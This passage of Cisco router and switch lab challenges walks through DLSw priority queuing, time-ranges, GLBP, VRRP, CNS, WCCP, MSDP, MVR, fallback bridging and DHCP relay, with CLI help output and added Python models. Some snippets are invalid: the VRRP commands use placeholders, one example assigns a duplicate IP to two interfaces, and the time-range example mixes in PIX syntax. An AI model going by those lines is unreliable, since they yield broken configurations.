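    acl20 = parse_standard_acl(["access-list 20 permit 10.0.0.0 0.0.0.255"])
    # constructed ARP sources heard on the interface
    print(accepted_mobile_hosts(acl20, ["10.0.0.77", "10.0.1.5", "10.0.0.200"]))
```

Run against the page's two lists, the first drops only the 60.60.60.0 route from the update and the second accepts mobile hosts from 10.0.0.0/24 while the implicit deny rejects 10.0.1.5.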

Cisco Router Challenge 207


Outline
This challenge involves defining a high priority for IP traffic but a medium priority for
DLSw on a given interface (E0). It is used to define QoS, and focuses on CCIE certification.
Objectives

The objectives of this challenge are to:

Define a priority-list.
Apply it on E0.
Define DLSW details.

Outline
(config)# int e0
(config-if)# priority-group 2
(config-if)# exit
(config)# priority-list 2 protocol dlsw medium
(config)# priority-list 2 protocol ip high
(config)# dlsw local-peer peer-id 192.168.0.2
(config)# dlsw remote-peer 0 tcp 192.168.0.1
(config)# dlsw bridge-group 1
(config)# dlsw udp-disable

Background
(config)# int e0
(config-if)# priority-group ?
  <1-16>  Priority group
(config-if)# priority-group 2
(config-if)# exit
(config)# priority-list ?
  <1-16>  Priority list number
(config)# priority-list 2 ?
  default      Set priority queue for unspecified datagrams
  interface    Establish priorities for packets from a named interface
  protocol     priority queueing by protocol
  queue-limit  Set queue limits for priority queue
(config)# priority-list 2 protocol ?
  aarp              AppleTalk ARP
  appletalk         AppleTalk
  arp               IP ARP
  bridge            Bridging
  bstun             Block Serial Tunnel
  cdp               Cisco Discovery Protocol
  clns              ISO CLNS
  clns_es           ISO CLNS End System
  clns_is           ISO CLNS Intermediate System
  cmns              ISO CMNS
  compressedtcp     Compressed TCP (VJ)
  decnet            DECnet
  decnet_node       DECnet Node
  decnet_router-l1  DECnet Router L1
  decnet_router-l2  DECnet Router L2
  dlsw              Data Link Switching (Direct encapsulation only)
  http              HTTP
  ip                IP
  ipv6              IPV6
  ipx               Novell IPX
  llc2              llc2
  pad               PAD links
  pppoe             PPP over Ethernet
  qllc              qllc protocol
  rsrb              Remote Source-Route Bridging
  snapshot          Snapshot routing support
  stun              Serial Tunnel

(config)# priority-list 2 p dl ?
high
medium
normal
low
(config)# priority-list 2 protocol dlsw medium
(config)# priority-list 2 protocol ip ?
high
medium
normal
low
(config)# priority-list 2 protocol ip high
(config)# dlsw ?
  allroute-netbios               Use All routes Broadcast for NETBIOS Explorers
  allroute-sna                   Use All routes Broadcast for SNA Explorers
  bgroup-list                    Configure a transparent bridge group list
  bridge-group                   DLSw interconnection to transparent bridging
  cache-ignore-netbios-datagram  Don't cache source mac/name of NetBIOS datagrams
  circuit-keepalives             Configure DLSw+ to generate periodic circuit keepalives
  disable                        Disable DLSw without altering the configuration
  explorerQ-depth                Configure depth of DLSw control queues
  fast-hpr-support               Enable fast-switched HPR transport
  group-cache                    Border Peer Caching Options
  history-log                    Configure DLSw Circuit-History Log Capability
  icannotreach                   Configure a resource not locally reachable by this router
  icanreach                      Configure resources locally reachable by this router
  llc2                           Dlsw llc2 options
  load-balance                   Configure load balancing
  local-peer                     Configure local peer
  mac-addr                       Configure a static MAC address - location or path
  max-multiple-rifs              Configure maximum multiple rifs per interface
  multicast                      Configure DLSw Multicast Capability
  netbios-cache-length           Configure NetBIOS name length
  netbios-keepalive-filter       Filter NetBIOS session alive packets
  netbios-name                   Configure a static NetBios name - location or path
  peer-log-changes               print logging message in router log ONLY for error events
  peer-on-demand-defaults        Change peer-on-demand defaults
  port-list                      Configure a port list
  prom-peer-defaults             Change prom-peer-defaults
  redundant-rings                Configure redundant ring-list
  remote-peer                    Configure a remote peer
  ring-list                      Configure a ring list
  rsvp                           Configure reservations using RSVP
  timer                          Configure DLSw timers
  tos                            Change IP Type Of Service precedence bits
  touch-timer                    Configure DLSw touch timers
  transparent                    Configure transparent media options
  udp-disable                    Disable DLSw UDP unicast feature
(config)# dlsw local- ?
  biu-segment         XID3 max receivable i-field spoofing and BIU segmenting
  border              Capable of operating as a border peer
  cluster             Set cluster id for this router
  cost                Set peer cost advertised to remote peers
  group               Set the peer group number for this router
  init-pacing-window  Initial Pacing Window Size for this local peer
  keepalive           Set the default remote peer keepalive interval
  lf                  Local peer largest frame size
  max-pacing-window   Maximum Pacing Window Size for this local peer
  passive             This router will not initiate remote peer connections
  peer-id             local-peer IP address; required for TCP/FST and peer groups
  promiscuous         Accept connections from non-configured remote peers
  v2-single-tcp       use dlsw v2 single tcp peer bringup for all remote peers from this router
  vrf                 VRF in which dlsw local peer resides
  <cr>
(config)# dlsw local- peer ?
  A.B.C.D  Local Peer IP address
(config)# dlsw local- peer 192.168.0.2 ?
  biu-segment         XID3 max receivable i-field spoofing and BIU segmenting
  border              Capable of operating as a border peer
  cluster             Set cluster id for this router
  cost                Set peer cost advertised to remote peers
  group               Set the peer group number for this router
  init-pacing-window  Initial Pacing Window Size for this local peer
  keepalive           Set the default remote peer keepalive interval
  lf                  Local peer largest frame size
  max-pacing-window   Maximum Pacing Window Size for this local peer
  passive             This router will not initiate remote peer connections
  peer-id             local-peer IP address; required for TCP/FST and peer groups
  promiscuous         Accept connections from non-configured remote peers
  v2-single-tcp       use dlsw v2 single tcp peer bringup for all remote peers from this router
  vrf                 VRF in which dlsw local peer resides
  <cr>
(config)# dlsw local-peer peer-id 192.168.0.2


(config)# dlsw remote ?
  <0-4095>  Remote peer ring group list
(config)# dlsw remote 0 ?
  frame-relay  Use Frame Relay for remote peer transport
  fst          Use fast sequence transport (FST) for remote peer transport
  interface    Use a direct interface for remote peer transport
  tcp          Use TCP for remote peer transport
(config)# dlsw remote 0 tcp ?
  A.B.C.D  Remote peer IP address
(config)# dlsw remote 0 tcp 192.168.0.1 ?
  backup-peer        Configure as a backup to an existing remote peer
  bytes-netbios-out  Configure netbios bytes output filtering for this peer
  circuit-weight     Configure circuit-weight for this peer
  cluster            Override cluster-id of remote peer
  cost               Cost to Reach this Remote Peer
  dest-mac           Exclusive destination mac-addr for remote peer
  dmac-output-list   Filter output destination mac addresses
  dynamic            Enable dynamic connection for this remote peer
  host-netbios-out   Configure netbios host output filtering for this peer
  keepalive          Set keepalive interval for this remote peer
  lf                 Largest Frame Size for this Remote Peer
  lsap-output-list   Filter output IEEE 802.5 encapsulated packets
  passive            Local peer will not initiate this remote peer connection
  priority           Enable prioritization features for this remote peer
  rif-passthru       Use rif_passthru for this remote peer
  rsvp               Configure reservations using RSVP
  tcp-queue-max      Maximum output TCP queue size for this remote peer
  timeout            Set retransmission timeout value for this remote peer
  v2-single-tcp      use dlsw v2 single tcp peer bringup for this remote peer
  <cr>
(config)# dlsw remote-peer 0 tcp 192.168.0.1
(config)# dlsw bridge-group 1
(config)# dlsw udp-disable

Cisco Router Challenge 208


Outline
This challenge involves the definition of a time-range, which can be applied to an access-control list.
Objectives
The objectives of this challenge are to:

Define a time-range.

Outline
(config)# time-range workingday
(config-time-range)# periodic weekday 5:00 to 9:00
(config-time-range)# periodic saturday 3:00 to 15:00
(config-time-range)# exit
(config)# access-list Columbia permit ip any any time-range workingday

Example
(config)# int e0
(config-if)# ip address 192.168.0.1 255.255.255.0
(config-if)# nameif newyork
(config-if)# exit
(config)# time-range workingday
(config-time-range)# ?
Time range configuration commands:
  absolute  absolute time and date
  exit      Exit from time-range configuration mode
  help      Help for time-range configuration commands
  no        Negate a command or set its defaults
  periodic  periodic time and date
(config-time-range)# ab ?
trange mode commands/options:
  end    ending time and date
  start  starting time and date
(config-time-range)# periodic ?
trange mode commands/options:
  Friday     Friday
  Monday     Monday
  Saturday   Saturday
  Sunday     Sunday
  Thursday   Thursday
  Tuesday    Tuesday
  Wednesday  Wednesday
  daily      Every day of the week
  weekdays   Monday thru Friday
  weekend    Saturday and Sunday
exec mode commands/options:
  interval  Performance monitoring interval in seconds
  quiet     Turn on quiet mode for perfomance monitoring
  settings  View perfomance monitoring settings
  verbose   Turn on verbose mode for perfomance monitoring
(config-time-range)# periodic weekday ?
trange mode commands/options:
  hh:mm  Starting time
(config-time-range)# periodic weekday 5:00 ?
trange mode commands/options:
  to  ending day and time
(config-time-range)# periodic weekday 5:00 to ?
trange mode commands/options:
  hh:mm  Ending time - stays valid until beginning of next minute
(config-time-range)# periodic weekday 5:00 to 9:00
(config-time-range)# exit
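To check what an ACL entry bound to the "workingday" range would do at a given moment, the evaluator below is an added example rather than code from the NetworkSims page. It handles the same-day "periodic <day> hh:mm to hh:mm" form used in the challenge, resolves abbreviated day keywords to a unique prefix the way IOS accepts "weekday" for "weekdays", and honours the help text above that the end time stays valid until the next minute begins; all names in the block are my own.

```python
# Added example (not from the NetworkSims page): evaluates an IOS periodic
# time-range and the ACL action a packet would get while it is active.
from datetime import datetime

# datetime.weekday(): Monday == 0 ... Sunday == 6
DAY_KEYWORDS = {
    "monday": {0}, "tuesday": {1}, "wednesday": {2}, "thursday": {3},
    "friday": {4}, "saturday": {5}, "sunday": {6},
    "weekdays": {0, 1, 2, 3, 4}, "weekend": {5, 6}, "daily": set(range(7)),
}


def resolve_day(word):
    """Expand a case-insensitive, possibly abbreviated day keyword."""
    word = word.lower()
    matches = [k for k in DAY_KEYWORDS if k.startswith(word)]
    if len(matches) != 1:
        raise ValueError(f"ambiguous or unknown day keyword: {word!r}")
    return DAY_KEYWORDS[matches[0]]


def parse_hhmm(text):
    """'hh:mm' -> minute of day, rejecting out-of-range values."""
    hours, minutes = (int(part) for part in text.split(":"))
    if not (0 <= hours <= 23 and 0 <= minutes <= 59):
        raise ValueError(f"bad time {text!r}")
    return hours * 60 + minutes


def parse_periodic(line):
    """'periodic <day-keyword> hh:mm to hh:mm' -> (days, start_min, end_min)."""
    parts = line.split()
    if len(parts) != 5 or parts[0] != "periodic" or parts[3] != "to":
        raise ValueError(f"not a same-day periodic entry: {line!r}")
    start, end = parse_hhmm(parts[2]), parse_hhmm(parts[4])
    if end < start:
        raise ValueError("end time must not precede start time on the same day")
    return resolve_day(parts[1]), start, end


def time_range_active(entries, when):
    """True if any entry covers the minute containing `when`; the end minute
    itself counts, matching 'stays valid until beginning of next minute'."""
    minute = when.hour * 60 + when.minute
    return any(when.weekday() in days and start <= minute <= end
               for days, start, end in entries)


def ace_action(entries, when, action="permit"):
    """An entry whose time-range is inactive is skipped, so with nothing after
    it the traffic falls to the implicit deny at the end of the list."""
    return action if time_range_active(entries, when) else "deny"


# the page's "workingday" range
WORKINGDAY = [
    parse_periodic("periodic weekday 5:00 to 9:00"),
    parse_periodic("periodic saturday 3:00 to 15:00"),
]

if __name__ == "__main__":
    # constructed sample times: a Monday morning, the last valid second, and a Sunday
    for when in (datetime(2024, 1, 8, 7, 30), datetime(2024, 1, 8, 9, 0, 59),
                 datetime(2024, 1, 8, 9, 1), datetime(2024, 1, 14, 7, 0)):
        print(when.isoformat(), ace_action(WORKINGDAY, when))
```

The multi-day "periodic monday 8:00 to friday 17:00" form and absolute ranges are outside what this block parses; it also evaluates against the clock you pass in, so the same caveat applies as on the router, where the range is only as trustworthy as the device's time source.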

Cisco Router Challenge 209


Outline
Gateway Load Balancing Protocol (GLBP), in the same way as Hot Standby Router Protocol
(HSRP) and Virtual Router Redundancy Protocol (VRRP), provides an alternative route for
network traffic from a failed router or circuit. It also supports load sharing between a group
of redundant routers. This challenge involves the configuration of GLBP.
Objectives
The objectives of this challenge are to:

Define GLBP details.
Enable GLBP.

Outline
(config)# interface fa0
(config-if)# ip address 192.168.0.1 255.255.255.0
(config-if)# glbp 10 authentication text testing
(config-if)# glbp 10 forwarder preempt delay minimum 60
(config-if)# glbp 10 load-balancing host-dependent
(config-if)# glbp 10 preempt delay minimum 60
(config-if)# glbp 10 priority 254
(config-if)# glbp 10 timers 5 18
(config-if)# glbp 10 ip 192.168.0.2

Example
(config)# interface fa0
(config-if)# ip address 192.168.0.1 255.255.255.0
(config-if)# glbp ?
  <0-1023>  Group number
(config-if)# glbp 10 ?
  authentication  Authentication method
  forwarder       Forwarder configuration
  ip              Enable group and set virtual IP address
  load-balancing  Load balancing method
  name            Redundancy name
  preempt         Overthrow lower priority designated routers
  priority        Priority level
  timers          Adjust GLBP timers
  weighting       Gateway weighting and tracking
(config-if)# glbp 10 authentication ?
  md5   MD5 authentication
  text  Plain text authentication
(config-if)# glbp 10 authentication text ?
  WORD  Text authentication string
(config-if)# glbp 10 authentication text testing
(config-if)# gl 10 forwarder ?
  preempt  Overthrow lower priority active forwarders
(config-if)# gl 10 forwarder preempt ?
  delay  Wait before preempting
  <cr>
(config-if)# gl 10 forwarder preempt delay ?
  minimum  Delay at least this long
(config-if)# glbp 10 forwarder preempt delay minimum ?
  <0-3600>  Number of seconds for minimum delay
(config-if)# glbp 10 forwarder preempt delay minimum 60
(config-if)# glbp 10 load-balancing ?
  host-dependent  Load balance equally, source MAC determines forwarder choice
  round-robin     Load balance equally using each forwarder in turn
  weighted        Load balance in proportion to forwarder weighting
(config-if)# glbp 10 load-balancing host-dependent
(config-if)# glbp 10 pre ?
  delay  Wait before preempting
  <cr>
(config-if)# glbp 10 preempt delay minimum 60
(config-if)# glbp 10 pri ?
  <1-255>  Priority value
(config-if)# glbp 10 priority 254
(config-if)# glbp 10 timers ?
  <1-60>    Hello interval in seconds
  msec      Specify hello interval in milliseconds
  redirect  Specify time-out values for failed forwarders
(config-if)# glbp 10 timers 5 18
(config-if)# glbp 10 ip ?
  A.B.C.D  Virtual IP address
(config-if)# glbp 10 ip 192.168.0.2

glbp 10 authentication text testing: This command authenticates GLBP packets received from the group of routers.

glbp 10 forwarder preempt delay minimum 60: This command allows the router to take over as AVF (Active Virtual Forwarder) within a GLBP group, if it has a higher priority than the current AVF.

glbp 10 load-balancing host-dependent: This command specifies the load balancing method, such as host-dependent, round-robin or weighted.

glbp 10 preempt delay minimum 60: This command allows the router to take over as AVG (Active Virtual Gateway) within a GLBP group, if it has a higher priority than the current AVG.

glbp 10 priority 254: This command sets up the priority level of the gateway within a GLBP group.

glbp 10 timers 5 18: This command configures the interval between hello packets sent by the AVG within the GLBP group. The parameters include the holdtime, which specifies the time before the virtual gateway and virtual forwarder information is considered invalid.

glbp 10 ip 192.168.0.2: Enable GLBP and define a virtual interface address.
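The command explanations above describe three interacting settings: priority, preempt with a minimum delay, and the hello/hold timers. The model below is an added example, not code from the NetworkSims page or a protocol implementation; Gateway, elect_avg and weak_authentication are my own names, the election rules are my reading of the explanations (higher priority wins, higher IP breaks ties, a preempting router waits out its delay, a silent router is dropped after the hold time), and the page's values (priority 254, delay 60, timers 5 18) are used as constructed input. weak_authentication is the configuration check a reviewer would run over this challenge: the "text" method sends the string in the clear in every hello, while the "md5" option listed in the same help output does not.

```python
# Added example (not from the NetworkSims page): a small model of GLBP AVG
# election with preempt delay and hold time, plus a config check for
# plain-text group authentication.
from dataclasses import dataclass

HELLO_SECONDS, HOLD_SECONDS = 5, 18   # "glbp 10 timers 5 18"


@dataclass
class Gateway:
    ip: str
    priority: int = 100          # GLBP default priority
    preempt: bool = False        # "glbp 10 preempt ..."
    preempt_delay: int = 0       # "... delay minimum <seconds>"
    up_since: float = 0.0        # when this router joined the group
    last_hello: float = 0.0      # last hello heard from it


def ip_key(ip):
    """Tie-break on the numeric IP address (higher wins at equal priority)."""
    return tuple(int(octet) for octet in ip.split("."))


def rank(gw):
    return (gw.priority, ip_key(gw.ip))


def is_alive(gw, now):
    """A gateway whose hellos have stopped is written off after the hold time."""
    return now - gw.last_hello <= HOLD_SECONDS


def elect_avg(gateways, current_avg, now):
    """Return the IP of the Active Virtual Gateway after this evaluation.

    The current AVG keeps the role while alive unless a live gateway with
    preempt enabled, whose preempt delay has elapsed, outranks it. If the
    AVG's hold time has expired, the best live gateway takes over."""
    live = [g for g in gateways if is_alive(g, now)]
    if not live:
        return None
    current = next((g for g in live if g.ip == current_avg), None)
    if current is None:
        return max(live, key=rank).ip
    candidates = [g for g in live
                  if g.preempt and now - g.up_since >= g.preempt_delay]
    return max(candidates + [current], key=rank).ip


def weak_authentication(config_line):
    """True for 'glbp <group> authentication text <string>', whose string
    travels in clear text in every hello and only prevents accidental
    group mixing; 'authentication md5' is the alternative shown above."""
    parts = config_line.split()
    return (len(parts) >= 4 and parts[0] == "glbp"
            and parts[2] == "authentication" and parts[3] == "text")


if __name__ == "__main__":
    # constructed group: the page's router plus a default-priority neighbour
    a = Gateway("192.168.0.1", priority=254, preempt=True, preempt_delay=60)
    b = Gateway("192.168.0.3")
    for now in (30.0, 60.0):
        a.last_hello = b.last_hello = now
        print(now, elect_avg([a, b], "192.168.0.3", now))
    print(weak_authentication("glbp 10 authentication text testing"))
```

At 30 seconds the higher-priority router is still inside its preempt delay and the neighbour stays AVG; at 60 seconds it takes over, and if either router then goes silent for more than 18 seconds it is excluded from the next election.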

Cisco Router Challenge 210


Outline
Virtual Router Redundancy Protocol (VRRP), in the same way as Hot Standby Router
Protocol (HSRP) and Gateway Load Balancing Protocol (GLBP), provides an alternative
route for network traffic from a failed router or circuit. This challenge involves the
configuration of VRRP.
Objectives
The objectives of this challenge are to:

Define VRRP details.
Enable VRRP.

Outline
(config)# interface fa0
(config-if)# ip address 192.168.0.1 255.255.255.0
(config-if)# vrrp 10 description text
(config-if)# vrrp 10 priority level
(config-if)# vrrp 10 preempt delay minimum 10
(config-if)# vrrp group timers learn
(config-if)# vrrp IP 192.168.0.2

Example
(config)# interface fa0
(config-if)# ip address 192.168.0.1 255.255.255.0
(config-if)# vrrp 10 description text
(config-if)# vrrp 10 priority level
(config-if)# vrrp 10 preempt delay minimum 10
(config-if)# vrrp group timers learn
(config-if)# vrrp IP 192.168.0.2

22 Switch Additional
Cisco Switch Challenge 127
Outline
This challenge involves setting up CNS.
Objectives
The objectives of this challenge are to:

Enable CNS.

Example
> en
# config t
(config)# cn ?
  config          Configuration Agent
  event           Event Agent
  exec            Exec Agent
  id              Get CNS ID for CNS agents
  trusted-server  Trusted Server Configuration
(config)# cn ev ?
  WORD  Hostname or ip address of event gateway
(config)# cn ev 10.0.0.1 ?
  <0-65535>      Event Gateway port number, default is 11011
  backup         Event Agent backup gateway
  encrypt        Enable Event Agent encryption
  failover-time  Seconds to wait for route to Primary after we already have route to backup
  keepalive      Keepalive timeout retry_count
  source         bind socket to a source ip
  <cr>
(config)# cn ev 10.0.0.1 k ?
  <0-65535>  timeout in seconds , default is 0
(config)# cn ev 10.0.0.1 k 120 ?
  <0-65535>  retry count , default is 0
(config)# cn ev 10.0.0.1 k 120 10 ?
  failover-time  Seconds to wait for route to Primary after we already have route to backup
  <cr>
(config)# cns event 10.0.0.1 keepalive 120 10
(config)# cns config connect-intf serial ping-interval 1 retries 1
(config-cns-conn-if)# ?
CNS bootstrap configuration commands:
  config-cli  Connect interface config cli
  exit        Exit from connect interface config mode
  line-cli    line cli for configuring modem lines
(config-cns-conn-if)# config-cli ip address negotiated
(config-cns-conn-if)# config-cli encapsulation ppp
(config-cns-conn-if)# config-cli ip directed-broadcast
(config-cns-conn-if)# config-cli no keepalive
(config-cns-conn-if)# config-cli no shutdown
(config-cns-conn-if)# exit
(config)# cns id ?
  Async              Async interface
  BVI                Bridge-Group Virtual Interface
  Dialer             Dialer interface
  FastEthernet       FastEthernet IEEE 802.3
  GigabitEthernet    GigabitEthernet IEEE 802.3z
  Group-Async        Async Group interface
  Lex                Lex interface
  Loopback           Loopback interface
  Multilink          Multilink-group interface
  Port-channel       Ethernet Channel of interfaces
  Tunnel             Tunnel interface
  Virtual-Template   Virtual Template interface
  Virtual-TokenRing  Virtual TokenRing
  Vlan               Catalyst Vlans
  hardware-serial    Use hardware serial number as unique ID
  hostname           Use hostname as unique ID
  string             Use an arbitrary string as the unique ID
(config)# cns id FA0/1 ?
  dns-reverse  Use DNS reverse look up to assign the hostname
  ipaddress    Use IP address as unique ID
  mac-address  Use MAC address as unique ID
(config)# cns id FA0/1 ipaddress ?
  event  Set this ID as the event ID
  <cr>
(config)# cns id FA0/1 ipaddress

Cisco Switch Challenge 128


Outline
This challenge involves setting up Web cache.
Objectives
The objectives of this challenge are to:

Enable Web-cache.

Apply redirection on FA0/2 and FA0/3.

Example
> en
Switch# config t
Switch(config)# ip wccp ?
  web-cache  Standard web caching service
Switch(config)# ip wccp web-cache ?
  password  Authentication password (key)
  <cr>
Switch(config)# ip wccp web-cache
Switch(config)# interface fastethernet0/1
Switch(config-if)# no switchport
Switch(config-if)# ip address 192.168.1.1 255.255.255.0
Switch(config-if)# no shutdown
Switch(config)# interface fastethernet0/2
Switch(config-if)# no switchport
Switch(config-if)# ip address 192.168.1.1 255.255.255.0
Switch(config-if)# no shutdown
Switch(config-if)# ip wccp ?
web-cache Standard web caching service
Switch(config-if)# ip wccp web-cache ?
redirect Set packet redirection options for the service
Switch(config-if)# ip wccp web-cache redirect ?
in Redirect to a Cache Engine appropriate inbound packets
Switch(config-if)# ip wccp web-cache redirect in ?
<cr>
Switch(config-if)# ip wccp web-cache redirect in

Explanation
The Web Cache Communication Protocol (WCCP) is used to configure the switch to
redirect traffic to cache engines, which transparently store frequently accessed
content and then deliver the cached version to the clients. WCCP is enabled on the
switch with:

Switch(config)# ip wccp web-cache

Then on the interface Layer 3 access is defined with:

Switch(config-if)# no switchport

Then to redirect the traffic to the cache engine:

Switch(config-if)# ip wccp web-cache redirect in

In this example the Web cache is connected to FA0/1, and web accesses are directed to this
port.

Cisco Switch Challenge 129


Outline
This challenge involves setting up MSDP.
Objectives
The objectives of this challenge are to:

Enable MSDP.

Example
> en
Switch# config t
Switch(config)# ip msdp ?
  cache-rejected-sa  Store rejected SAs from all peers
  cache-sa-state     Configure this system to cache SA state
  default-peer       Default MSDP peer to accept SA messages from
  description        Peer specific description
  filter-sa-request  Filter SA-Requests from peer
  keepalive          Configure keepalive parameters for a peer
  mesh-group         Configure an MSDP mesh-group
  originator-id      Configure MSDP Originator ID
  peer               Configure an MSDP peer
  redistribute       Inject multicast route entries into MSDP
  sa-filter          Filter SA messages from peer
  sa-limit           Configure SA limit for a peer
  shutdown           Administratively shutdown MSDP peer
  timer              MSDP timer
  ttl-threshold      Configure TTL Thresold for MSDP Peer
Switch(config)# ip msdp cache-sa-state ?
<cr>
Switch(config)# ip msdp cache-sa-state
Switch(config)# ip msdp filter-sa ?
Hostname or A.B.C.D Peer name or address
Switch(config)# ip msdp filter-sa 1.2.3.4 ?
list Access-list
<cr>
Switch(config)# ip msdp filter-sa 1.2.3.4

Cisco Switch Challenge 130


Outline
This challenge involves configuring MVR (Multicast VLAN Registration), which is used
in applications that have a wide-scale deployment of multicast traffic over an Ethernet ring-based
service provider network. This is typical in broadcasting TV channels. With MVR,
subscribers can listen on multicast addresses on certain VLANs.

Objectives
The objectives of this challenge are to:

Define VLANs.
Set up MVR.

Example
> enable
# config t
(config)# vlan 1
(config-vlan)# ?
VLAN configuration commands:
are
Maximum number of All Route Explorer hops for this VLAN (or
zero if none specified)
backupcrf
Backup CRF mode of the VLAN
bridge
Bridging characteristics of the VLAN
exit
Apply changes, bump revision number, and exit mode
media
Media type of the VLAN
mtu
VLAN Maximum Transmission Unit
name
Ascii name of the VLAN
no
Negate a command or set its defaults
parent
ID number of the Parent VLAN of FDDI or Token Ring type VLANs
private-vlan Configure a private VLAN
remote-span
Configure as Remote SPAN VLAN
ring
Ring number of FDDI or Token Ring type VLANs
said
IEEE 802.10 SAID
shutdown
Shutdown VLAN switching
state
Operational state of the VLAN
ste
Maximum number of Spanning Tree Explorer hops for this VLAN (or
zero if none specified)
stp
Spanning tree characteristics of the VLAN
tb-vlan1
ID number of the first translational VLAN for this VLAN (or
zero if none)
tb-vlan2
ID number of the second translational VLAN for this VLAN (or
zero if none)
(config-vlan)# name ?
WORD The ascii name for the VLAN
(config-vlan)# name edinburgh
(config-vlan)# no ?
are
Maximum number of All Route Explorer hops for this VLAN (or
zero if none specified)
backupcrf
Backup CRF mode of the VLAN
bridge
Bridging characteristics of the VLAN
exit
Apply changes, bump revision number, and exit mode
media
Media type of the VLAN
mtu
VLAN Maximum Transmission Unit
name
Ascii name of the VLAN
parent
ID number of the Parent VLAN of FDDI or Token Ring type VLANs
private-vlan Configure a private VLAN
remote-span
Configure as Remote SPAN VLAN
ring
Ring number of FDDI or Token Ring type VLANs
said
IEEE 802.10 SAID
shutdown
Shutdown VLAN switching
state
Operational state of the VLAN
ste
Maximum number of Spanning Tree Explorer hops for this VLAN (or
zero if none specified)
stp
Spanning tree characteristics of the VLAN
tb-vlan1
ID number of the first translational VLAN for this VLAN (or
zero if none)
tb-vlan2
ID number of the second translational VLAN for this VLAN (or
zero if none)
(config-vlan)# no shutdown
(config-vlan)# exit
(config)# int vlan 1
(config-if)# ip address 192.168.0.1 255.255.255.0
(config-if)# exit
(config)# mvr ?
group
Configure a MVR multicast group
mode
Configure MVR mode of operation
querytime Set MVR query response time
vlan
Set MVR multicast VLAN
<cr>

(config)# mvr
(config)# mvr group ?
A.B.C.D IP multicast address
(config)# mvr group 224.1.23.4
(config)# mvr querytime ?
<1-100> time value in units of 1/10 seconds
(config)# mvr querytime 5
(config)# mvr vlan ?
<1-4094> MVR Multicast VLAN id
(config)# mvr vlan 12
(config)# mvr mode ?
compatible Compatible Mode
dynamic
Dynamic Mode
<cr>
(config)# mvr mode dynamic

Cisco Switch Challenge 131


Outline
This challenge involves setting up a bridge group for fallback bridging (VLAN bridging). With
fallback bridging, non-IP packets that the switch does not route are forwarded between VLAN
bridge domains and routed ports.
Objectives
The objectives of this challenge are to:

Define a bridge-group.
Apply it to FA0/2

Example
> enable
# config t
Switch(config)# bridge ?
<1-255>            Bridge Group number for Bridging.
crb                Concurrent routing and bridging
irb                Integrated routing and bridging
mac-address-table  MAC-address table configuration commands
Switch(config)# bridge 10 ?
acquire                   Dynamically learn new, unconfigured stations
address                   Block or forward a particular Ethernet address
aging-time                Set forwarding entry aging time
bitswap-layer3-addresses  Bitswap embedded layer 3 MAC adddresses
bridge                    Specify a protocol to be bridged in this bridge group
circuit-group             Circuit-group
domain                    Establish multiple bridging domains
forward-time              Set forwarding delay time
hello-time                Set interval between HELLOs
lat-service-filtering     Perform LAT service filtering
max-age                   Maximum allowed message age of received Hello BPDUs
priority                  Set bridge priority
protocol                  Specify spanning tree protocol
route                     Specify a protocol to be routed in this bridge group
subscriber-policy         Subscriber group bridging
Switch(config)# bridge 10 protocol vlan-bridge
Switch(config)# bridge 10 aging-time ?
<10-1000000> Seconds
Switch(config)# bridge 10 aging-time 20
Switch(config)# bridge 10 hello-time 20
Switch(config)# bridge 10 forward-time 20
Switch(config)# bridge 10 max-age 10
Switch(config)# bridge 10 priority ?
<0-65535> Priority (low priority more likely to be root)
Switch(config)# bridge 10 priority 10
Switch(config)# interface fa0/1
Switch(config-if)# no switchport
Switch(config-if)# no shutdown
Switch(config-if)# bridge-group ?
<1-255> Assign an interface to a Bridge Group.
Switch(config-if)# bridge-group 10 ?
<cr>
circuit-group
Associate serial interface with a circuit group
input-address-list
Filter packets by source address
input-lat-service-deny
Deny input LAT service advertisements matching a
group list
input-lat-service-permit
Permit input LAT service advertisements matching a
group list
input-lsap-list
Filter incoming IEEE 802.3 encapsulated packets
input-type-list
Filter incoming Ethernet packets by type code
lat-compression
Enable LAT compression over serial or ATM
interfaces
output-address-list
Filter packets by destination address
output-lat-service-deny
Deny output LAT service advertisements matching a
group list
output-lat-service-permit Permit output LAT service advertisements matching
a group list
output-lsap-list
Filter outgoing IEEE 802.3 encapsulated packets
output-type-list
Filter outgoing Ethernet packets by type code
port-protected
There will be no traffic between this interface
and other protected port interface in this bridge group
subscriber-loop-control
Configure subscriber loop control
block-unknown-source
block traffic which come from unknown source MAC
address
input-pattern-list
Filter input with a pattern list
output-pattern-list
Filter output with a pattern list
path-cost
Set interface path cost
priority
Set interface priority
source-learning
learn source MAC address
spanning-disabled
Disable spanning tree on a bridge group
unicast-flooding
flood packets with unknown unicast destination MAC
addresses
Switch(config-if)# bridge-group 10
Switch(config-if)# bridge-group 10 path-cost ?
<0-65535> Path cost (higher values are higher costs)
Switch(config-if)# bridge-group 10 path-cost 10
Switch(config-if)# bridge-group 10 spanning-disable

Cisco Switch Challenge 132


Area: Switches DHCP Reforwarding
Outline
This challenge involves defining DHCP reforwarding
Objectives
The objectives of this challenge are to:

Define DHCP reforwarding.

The commands used are:


> enable
# config t
(config)# service dhcp
(config)# ip dhcp relay information option
(config)# ip dhcp relay information policy drop

Example
> enable
# config t
(config)# service ?
compress-config        Compress the configuration file
config                 TFTP load config files
dhcp                   Enable DHCP server and relay agent
disable-ip-fast-frag   Disable IP particle-based fast fragmentation
exec-callback          Enable exec callback
exec-wait              Delay EXEC startup on noisy lines
finger                 Allow responses to finger requests
hide-telnet-addresses  Hide destination addresses in telnet command
linenumber             enable line number banner for each exec
nagle                  Enable Nagle's congestion control algorithm
old-slip-prompts       Allow old scripts to operate with slip/ppp
pad                    Enable PAD commands
password-encryption    Encrypt system passwords
prompt                 Enable mode specific prompt
pt-vty-logging         Log significant VTY-Async events
sequence-numbers       Stamp logger messages with a sequence number
slave-log              Enable log capability of slave IPs
tcp-keepalives-in      Generate keepalives on idle incoming network connections
tcp-keepalives-out     Generate keepalives on idle outgoing network connections
tcp-small-servers      Enable small TCP servers (e.g., ECHO)
telnet-zeroidle        Set TCP window 0 when connection is idle
timestamps             Timestamp debug/log messages
udp-small-servers      Enable small UDP servers (e.g., ECHO)
(config)# service dhcp


(config)# ip dhcp ?
conflict                   DHCP address conflict parameters
database                   Configure DHCP database agents
excluded-address           Prevent DHCP from assigning certain addresses
limited-broadcast-address  Use all 1's broadcast address
ping                       Specify ping parameters used by DHCP
pool                       Configure DHCP address pools
relay                      DHCP relay agent parameters
smart-relay                Enable Smart Relay feature
snooping                   DHCP Snooping
(config)# ip dhcp relay ?
forward      Enable forwarding DHCP broadcasts
information  Relay agent information option
(config)# ip dhcp relay information ?
check      Validate relay information in BOOTREPLY
